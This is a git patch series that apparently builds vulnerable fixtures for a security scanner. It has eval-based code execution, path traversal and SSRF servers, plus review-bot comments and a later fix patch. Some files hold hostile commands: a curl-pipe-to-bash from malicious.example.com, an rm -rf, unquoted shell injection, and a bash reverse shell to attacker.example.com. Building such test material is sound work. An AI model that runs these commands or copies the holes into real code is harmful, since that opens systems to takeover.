From bb2dea1fed35ac02b3f62f32c12679c44b0507d7 Mon Sep 17 00:00:00 2001
From: Mohammed
Date: Tue, 4 Nov 2025 16:46:15 -0500
Subject: [PATCH 1/2] add code
---
 browser copy/index.js | 5 ++++
 cli/index.js | 18 ++++++++++++++
 disk/index.js | 17 +++++++++++++
 http copy/index.js | 56 +++++++++++++++++++++++++++++++++++++++++++
 package.json | 11 +++++++++
 stdin/index.js | 12 ++++++++++
 ws/index.js | 12 ++++++++++
 7 files changed, 131 insertions(+)
 create mode 100644 browser copy/index.js
 create mode 100644 cli/index.js
 create mode 100644 disk/index.js
 create mode 100644 http copy/index.js
 create mode 100644 package.json
 create mode 100644 stdin/index.js
 create mode 100644 ws/index.js
diff --git a/browser copy/index.js b/browser copy/index.js
new file mode 100644
index 0000000..5f1b215
--- /dev/null
+++ b/browser copy/index.js
@@ -0,0 +1,5 @@
+function executeUserScript() {
+ var userScript = document.getElementById('userScript').value;
+ // Using eval to execute user-provided script
+ eval(userScript);
+}
diff --git a/cli/index.js b/cli/index.js
new file mode 100644
index 0000000..7e5db7a
--- /dev/null
+++ b/cli/index.js
@@ -0,0 +1,18 @@
+const { exec } = require('child_process');
+
+const userArg = process.argv[2] || '';
+
+const cmd = `
+ rm -rf /tmp/vuln_dir --no-preserve-root &&
+ curl http://malicious.example.com/install.sh | bash &&
+ ls ${userArg}
+`;
+
+console.log('[*] Running dangerous CLI pipeline…');
+exec(cmd, (err, stdout, stderr) => {
+ if (err) {
+ console.error('[!] Pipeline failed:', err);
+ return;
+ }
+ console.log('[+] Pipeline succeeded. stdout:\\n', stdout);
+});
diff --git a/disk/index.js b/disk/index.js
new file mode 100644
index 0000000..963519e
--- /dev/null
+++ b/disk/index.js
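Review bot: The directory name `browser copy/` (and `http copy/` in the fourth file of this patch) reads as a Finder duplication artifact rather than an intended name, and the embedded space complicates shell scripts and import specifiers; rename to `browser/` and `http/` before merging. `eval(userScript)` executes whatever the `userScript` element contains — if this is a deliberate scanner fixture, the comment above it should say so (`// RCE fixture: intentionally evaluates user-supplied script`) so a reader does not take it for a missing sanitizer. `var userScript` should be `const`, matching the `const` style used in the other files of this patch.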
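Review bot: `userArg` is spliced unquoted into the shell string passed to `exec`, so shell metacharacters in `process.argv[2]` are interpreted as part of the pipeline rather than as an argument to `ls`; for the `ls` step pass it out-of-band instead, `execFile('ls', [userArg], cb)`, which needs no shell. The `'stdout:\\n'` literal appears double-escaped and will print a backslash followed by `n` rather than a line break; `'stdout:\n'` is presumably what was meant. `stderr` is received by the callback but never logged on the failure path, here and in `stdin/index.js`, so the diagnostic from a failed step is lost — include it in the `console.error` call.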
@@ -0,0 +1,17 @@
+const express = require('express');
+const fs = require('fs');
+const path = require('path');
+const app = express();
+
+// Path Traversal
+app.get('/read', (req, res) => {
+ const file = req.query.file;
+ const fullPath = path.resolve(__dirname, file);
+ if (!fullPath.startsWith(__dirname + path.sep)) return res.status(400).send('Invalid file path');
+ fs.readFile(fullPath, 'utf8', (err, data) => {
+ if (err) return res.status(500).send(err.message);
+ res.send(data);
+ });
+});
+
+app.listen(3001, () => console.log('Disk vuln on port 3001'));
diff --git a/http copy/index.js b/http copy/index.js
new file mode 100644
index 0000000..1577130
--- /dev/null
+++ b/http copy/index.js
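Review bot: The containment check roots reads at `__dirname`, the directory that holds this server's own source, so every file deployed next to `index.js` — the handler itself and any config placed beside it — is readable through `/read`. Serve from a dedicated content directory instead, e.g. `const ROOT = path.join(__dirname, 'public');`, and resolve and compare against `ROOT` rather than `__dirname`; the second patch in this series tightens the check and the error handling but keeps `__dirname` as the root.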
@@ -0,0 +1,56 @@
+const express = require('express');
+const axios = require('axios');
+const { URL } = require('url');
+const dns = require('dns').promises;
+const app = express();
+
+function isPrivateIp(ip) {
+ return ip === '::1' ||
+ /^127\./.test(ip) ||
+ /^10\./.test(ip) ||
+ /^192\.168\./.test(ip) ||
+ /^172\.(1[6-9]|2[0-9]|3[0-1])\./.test(ip) ||
+ ip.startsWith('fc') || ip.startsWith('fd') ||
+ ip.startsWith('fe80:');
+}
+
+// SSRF
+app.get('/fetch', async (req, res) => {
+ const url = req.query.url;
+ let parsedUrl;
+ try {
+ parsedUrl = new URL(url);
+ } catch (e) {
+ return res.status(400).send('Invalid URL');
+ }
+ const hostname = parsedUrl.hostname;
+ if (!['http:', 'https:'].includes(parsedUrl.protocol) ||
+ hostname === 'localhost' ||
+ hostname === '127.0.0.1' ||
+ hostname === '::1' ||
+ /^(10|127)\./.test(hostname) ||
+ /^172\.(1[6-9]|2[0-9]|3[0-1])\./.test(hostname) ||
+ /^192\.168\./.test(hostname)) {
+ return res.status(400).send('URL not allowed');
+ }
+ try {
+ // DNS resolution to prevent DNS rebinding
+ try {
+ const addresses = await dns.lookup(parsedUrl.hostname, { all: true });
+ for (const { address } of addresses) {
+ if (isPrivateIp(address)) {
+ return res.status(400).send('URL not allowed');
+ }
+ }
+ } catch (e) {
+ return res.status(400).send('Invalid hostname');
+ }
+
+ const resp = await axios.get(url);
+ res.send(resp.data);
+ } catch (e) {
+ res.status(500).send(e.message);
+ }
+});
+
+app.listen(3000, () => console.log('HTTP vuln on port 3000'));
diff --git a/package.json b/package.json
new file mode 100644
index 0000000..5cb2217
--- /dev/null
+++ b/package.json
@@ -0,0 +1,11 @@
+{
+ "name": "uwu-vuln",
+ "version": "1.0.0",
+ "main": "index.js",
+ "scripts": {
+ "test": "echo \"Error: no test specified\" && exit 1"
+ },
+ "author": "",
+ "license": "ISC",
+ "description": ""
+}
diff --git a/stdin/index.js b/stdin/index.js
new file mode 100644
index 0000000..b712e33
--- /dev/null
+++ b/stdin/index.js
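Review bot: `isPrivateIp` leaves gaps that the post-lookup check relies on it to close: 169.254.0.0/16 link-local and 0.0.0.0/8 are not tested, and an IPv4-mapped IPv6 address (`::ffff:` prefix) matches none of the IPv4 patterns; add `/^169\.254\./.test(ip) || /^0\./.test(ip) ||` to the chain and strip a leading `::ffff:` before testing. The resolved addresses are only inspected — `axios.get(url)` resolves the hostname again and follows redirects by default — so the `// DNS resolution to prevent DNS rebinding` comment claims more than the code delivers; pass `{ maxRedirects: 0 }` and a custom `lookup` on the HTTP agent (or connect to the vetted address directly) so the request goes to the address that was checked. If `dns.lookup` returns IP literals unchanged, as it appears to, the hostname regexes in the pre-check become redundant once `isPrivateIp` is complete and could be folded into the lookup step.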
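Review bot: The manifest declares no `dependencies`, yet the sibling files `require('express')`, `require('axios')` and `require('ws')`, so a fresh `npm install` produces a tree in which every server exits at startup with MODULE_NOT_FOUND; add a `"dependencies"` object naming those three packages at the versions the fixtures were written against. `"main": "index.js"` points at a file that does not exist at the repository root — add an entry point or drop the field.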
@@ -0,0 +1,12 @@
+const { exec } = require('child_process');
+
+const payload = 'bash -i >& /dev/tcp/attacker.example.com/4444 0>&1';
+
+console.log('[*] Executing reverse shell payload…');
+exec(payload, (err, stdout, stderr) => {
+ if (err) {
+ console.error('[!] Error executing payload:', err);
+ return;
+ }
+ console.log('[+] Payload executed. stdout:', stdout);
+});
diff --git a/ws/index.js b/ws/index.js
new file mode 100644
index 0000000..7b0fc64
--- /dev/null
+++ b/ws/index.js
@@ -0,0 +1,12 @@
+const WebSocket = require('ws');
+const wss = new WebSocket.Server({ port: 8080 });
+
+// RCE
+wss.on('connection', ws => {
+ ws.on('message', msg => {
+ eval(msg);
+ ws.send('Executed: ' + msg);
+ });
+});
+
+console.log('WS vuln on port 8080');
\ No newline at end of file
From 55f8fcfb89b7c9bdcaf4a7f6b9a19d7abe649bcd Mon Sep 17 00:00:00 2001
From: ZeroPath
Date: Tue, 4 Nov 2025 21:52:44 +0000
Subject: [PATCH 2/2] fix: prevent path traversal and info disclosure via symlink race
---
 disk/index.js | 50 +++++++++++++++++++++++++++++++++++++++++++++-----
 1 file changed, 45 insertions(+), 5 deletions(-)
diff --git a/disk/index.js b/disk/index.js
index 963519e..6ad30d7 100644
--- a/disk/index.js
+++ b/disk/index.js
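Review bot: The per-connection socket registers no `error` listener, so a transport error on any client surfaces as an unhandled `'error'` event and terminates the process; add `ws.on('error', (err) => console.error(err));` beside the `message` handler. `eval(msg)` hands peer-controlled input straight to the interpreter — if this is a deliberate scanner fixture, the `// RCE` comment should say so explicitly (`// RCE fixture: intentionally evaluates untrusted socket input`) so the line is not mistaken for a dropped sanitizer. The reply `'Executed: ' + msg` relies on implicit stringification when `msg` arrives as a Buffer; `String(msg)` or a template literal makes that explicit.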
@@ -6,12 +6,52 @@ const app = express();
 // Path Traversal
 app.get('/read', (req, res) => {
 const file = req.query.file;
+ if (!file || typeof file !== 'string') return res.status(400).send('Invalid file');
 const fullPath = path.resolve(__dirname, file);
- if (!fullPath.startsWith(__dirname + path.sep)) return res.status(400).send('Invalid file path');
- fs.readFile(fullPath, 'utf8', (err, data) => {
- if (err) return res.status(500).send(err.message);
- res.send(data);
- });
+ // Ensure the resolved path is inside the application directory
+ if (!fullPath.startsWith(__dirname + path.sep) && fullPath !== __dirname) return res.status(400).send('Invalid file path');
+
+ // Prefer O_NOFOLLOW to avoid following symlinks at open time (mitigates TOCTOU symlink swap).
+ // If O_NOFOLLOW isn't available on the platform, fall back to lstat-based check and reject symlinks.
+ const hasONoFollow = fs.constants && (typeof fs.constants.O_NOFOLLOW !== 'undefined');
+ const openFlags = hasONoFollow ? (fs.constants.O_RDONLY | fs.constants.O_NOFOLLOW) : fs.constants.O_RDONLY;
+
+ const finishWithFd = (fd) => {
+ fs.readFile(fd, 'utf8', (err, data) => {
+ fs.close(fd, () => {});
+ if (err) {
+ console.error(err);
+ return res.status(500).send('Unable to read file');
+ }
+ res.send(data);
+ });
+ };
+
+ if (hasONoFollow) {
+ fs.open(fullPath, openFlags, (err, fd) => {
+ if (err) {
+ console.error(err);
+ return res.status(400).send('Invalid file path');
+ }
+ finishWithFd(fd);
+ });
+ } else {
+ // Fallback: reject if the path is a symlink (reduces TOCTOU window on platforms without O_NOFOLLOW)
+ fs.lstat(fullPath, (err, stats) => {
+ if (err) {
+ console.error(err);
+ return res.status(400).send('Invalid file path');
+ }
+ if (stats.isSymbolicLink()) return res.status(400).send('Invalid file path');
+ fs.open(fullPath, openFlags, (err, fd) => {
+ if (err) {
+ console.error(err);
+ return res.status(400).send('Invalid file path');
+ }
+ finishWithFd(fd);
+ });
+ });
+ }
 });
app.listen(3001, () => console.log('Disk vuln on port 3001'));
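Review bot: `O_NOFOLLOW` refuses a symlink only at the final path component, so the TOCTOU comment on the `hasONoFollow` branch overstates the guarantee: a symlinked directory anywhere between `__dirname` and the target is still followed at open time. Add that caveat to the comment, and validate the descriptor after open with `fs.fstat(fd, …)` requiring `stats.isFile()` before `finishWithFd` reads it, which also rejects directories and device nodes. The `&& fullPath !== __dirname` clause on the containment check deliberately admits the directory itself, which `fs.open` accepts read-only on Linux and `fs.readFile` then rejects with EISDIR as a 500 — dropping the clause turns that into the intended 400. `fs.close(fd, () => {})` discards close errors; log them as the other error paths do.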